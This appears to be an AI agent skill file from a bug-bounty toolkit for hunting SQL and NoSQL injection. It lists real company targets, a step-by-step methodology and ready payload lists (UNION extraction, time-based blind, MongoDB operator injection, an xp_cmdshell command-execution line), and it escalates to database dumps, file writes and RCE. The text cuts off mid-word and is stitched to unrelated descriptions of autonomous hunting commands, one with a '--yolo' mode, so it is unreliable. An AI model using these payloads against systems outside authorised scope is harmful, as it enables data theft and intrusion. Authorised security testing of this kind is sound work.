hunt-sqli
The hunt-sqli skill identifies SQL and NoSQL injection vulnerabilities across modern application architectures, including MongoDB $regex operators, Django ORM raw fragments, Sequelize vulnerabilities, second-order SOQL injection, and time-based blind SQLi in GraphQL resolvers. Use this skill when systematically testing SaaS platforms, e-commerce systems, search endpoints, analytics infrastructure, third-party plugins, and internal tools exposed externally for injection flaws that could expose sensitive data at scale.
git clone --depth 1 https://github.com/elementalsouls/Claude-BugHunter /tmp/hunt-sqli && cp -r /tmp/hunt-sqli/skills/hunt-sqli ~/.claude/skills/hunt-sqliSKILL.md
## Crown Jewel Targets
SQL injection remains one of the highest-paying vulnerability classes in bug bounty because it directly threatens data confidentiality, integrity, and availability at scale.
**Highest-value targets:**
- **SaaS platforms with multi-tenant databases** — one injection can expose all customer data
- **E-commerce/payment systems** — PII, card data, transaction records
- **Search endpoints** — user-controlled input passed directly to queries (e.g., Rockstar Games `/search`)
- **Analytics/tracking subdomains** — often built fast, tested less (e.g., `sctrack.email.uber.com.cn`)
- **Third-party plugins on enterprise installs** — WordPress plugins, CMS extensions running on corporate domains (Uber's Huge IT Video Gallery)
- **Internal tooling exposed externally** — Apache Airflow, GitHub Enterprise, admin dashboards
- **NoSQL backends (MongoDB)** — often overlooked, same injection class, different syntax
**Asset types that pay most:**
- Production APIs with `/search`, `/filter`, `/sort`, `/report` parameters
- Subdomains with legacy stacks (`.cn`, `.co`, `.io` regional variants)
- Self-hosted open-source tools (Airflow, GitLab, Jenkins) on bounty scope
- Email tracking and analytics infrastructure
---
## Attack Surface Signals
**URL patterns that suggest injectable parameters:**
```
/search?q=
/filter?category=
/sort?by=&order=
/report?start_date=&end_date=
/api/v1/items?id=
/index.php?id=
/gallery?album_id=
/track?uid=&campaign=
?page=&limit=&offset=
```
**Response header signals:**
- `X-Powered-By: PHP` — likely MySQL/PostgreSQL backend
- `Server: Apache` + PHP — classic LAMP stack
- `X-Powered-By: Express` — possible MongoDB/NoSQL backend
- Database error messages leaking in responses (MySQL, PostgreSQL, MSSQL error strings)
**JavaScript patterns indicating dynamic query construction:**
```javascript
// Look for these in JS bundles
fetch(`/api/search?q=${userInput}`)
$.ajax({ url: '/filter?sort=' + param })
axios.get('/report?from=' + startDate + '&to=' + endDate)
```
**Tech stack signals:**
- WordPress sites with third-party plugins (check `/wp-content/plugins/`)
- Apache Airflow endpoints (`/admin/`, `/api/experimental/`)
- GitHub Enterprise (`/_graphql`, `/search`, `/api/v3/`)
- Node.js + MongoDB combinations (check for `$where`, `$regex` in request bodies)
- PHP applications returning verbose MySQL errors
**Content-type signals for NoSQL:**
- `Content-Type: application/json` bodies with nested object parameters
- Parameters accepting arrays: `param[]=value` or `{"key": {"$gt": ""}}`
---
## Step-by-Step Hunting Methodology
1. **Enumerate all input vectors** — Use Burp Suite passive scan during normal app usage. Capture every parameter: GET, POST, JSON body, HTTP headers (User-Agent, Referer, X-Forwarded-For), cookies, path segments.
2. **Identify the tech stack** — Check response headers, error messages, job postings, Wappalyzer, BuiltWith. Determines which payloads to prioritize (MySQL vs PostgreSQL vs MongoDB).
3. **Baseline the response** — Note normal response length, status code, and response time for a clean request. This is your diff baseline.
4. **Send error-based probes** — Inject single quote `'`, double quote `"`, backtick `` ` ``, and observe for:
- Database error messages (immediate confirmation)
- Response length change
- HTTP 500 errors
5. **Test boolean-based blind** — Send true/false conditions and compare responses:
- `param=1 AND 1=1` vs `param=1 AND 1=2`
- If responses differ → likely injectable
6. **Test time-based blind** — When no visible difference exists:
- MySQL: `param=1 AND SLEEP(5)`
- PostgreSQL: `param=1; SELECT pg_sleep(5)--`
- MSSQL: `param=1; WAITFOR DELAY '0:0:5'--`
- Measure response time delta > 5 seconds = confirmed
7. **For NoSQL (MongoDB)** — Test object injection via JSON body and PHP-style array params:
- Replace string value with `{"$gt": ""}` in JSON
- Try `param[$ne]=invalid` in query strings
8. **Automate confirmation** — Run `sqlmap` on confirmed candidates with `--level=3 --risk=2` to enumerate databases without manual effort.
9. **Escalate impact** — Attempt:
- `UNION`-based extraction (enumerate columns first)
- `INFORMATION_SCHEMA` dump
- File read/write (`LOAD_FILE`, `INTO OUTFILE`) if permissions allow
- Stacked queries for RCE (MSSQL `xp_cmdshell`)
10. **Document the full chain** — Capture Burp repeater request/response, sqlmap output, and proof of data extraction (non-sensitive fields only for report).
---
## Payload & Detection Patterns
**Initial Error-Based Probes:**
```sql
'
''
`
')
"))
' OR '1'='1
' OR 1=1--
" OR 1=1--
' OR 1=1#
admin'--
```
**Boolean-Based Blind:**
```sql
' AND 1=1-- (true condition)
' AND 1=2-- (false condition)
' AND SUBSTRING(version(),1,1)='5'--
1 AND (SELECT COUNT(*) FROM users) > 0--
```
**Time-Based Blind:**
```sql
-- MySQL
' AND SLEEP(5)--
1; SELECT SLEEP(5)--
-- PostgreSQL
'; SELECT pg_sleep(5)--
1 AND (SELECT 1 FROM pg_sleep(5))--
-- MSSQL
'; WAITFOR DELAY '0:0:5'--
1; EXEC xp_cmdshell('ping -n 5 127.0.0.1')--
-- SQLite
' AND (SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(300000000/2)))))==1--
```
**UNION-Based (enumerate columns first):**
```sql
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 10-- (find column count via error)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT 1,database(),3--
' UNION SELECT 1,group_concat(table_name),3 FROM information_schema.tables WHERE table_schema=database()--
```
**NoSQL Injection (MongoDB):**
```javascript
// JSON body injection
{"username": {"$gt": ""}, "password": {"$gt": ""}}
{"username": {"$regex": ".*"}, "password": {"$regex": ".*"}}
{"$where": "this.username == this.password"}
// Query string injection
username[$ne]=invalid&password[$ne]=invalid
username[$regex]=.*&password[$regex]=.*
```
**PHP Hash/Array Injection:**
```
# Replace scalar with array
param[key]=value
param[$gt]=0
param[$ne]=null
```
**Grep patterns fRun autonomous hunt loop on a target — scope check → recon → rank surface → hunt → validate → report with configurable checkpoints. Usage: /autopilot target.com [--paranoid|--normal|--yolo]
Build an exploit chain — given bug A, finds B and C to combine for higher severity and payout. Knows common chain patterns: IDOR→ATO, SSRF→cloud metadata, XSS→ATO, open redirect→OAuth theft, S3→bundle→secret→OAuth. Usage: /chain
Active vulnerability hunting. Two-track dispatcher — asks Red Team vs WAPT, hands off to hunt-dispatch skill and sibling commands. Usage: /hunt target.com | /hunt *.target.com | /hunt targets.txt [--vuln-class X] [--source-code P] [--chrome]
On-demand intelligence fetch for a target — CVEs, disclosed reports, new features. Wraps learn.py + hunt memory context. Usage: /intel target.com
Inspect or rotate hunt-memory JSONL files (audit.jsonl, patterns.jsonl, journal.jsonl). Caps file size and keeps N rotated backups so memory does not grow unbounded.
Pick up a previous hunt on a target — shows hunt history, untested endpoints, and memory-informed suggestions. Usage: /pickup target.com
Run full recon pipeline on a target — subdomain enum (Chaos API + subfinder), live host discovery (dnsx + httpx), URL crawl (katana + waybackurls + gau), gf pattern classification, nuclei scan. Outputs to recon/<target>/ directory. Usage: /recon target.com
Log current finding or successful pattern to hunt memory. Auto-fills from /validate output if available. Usage: /remember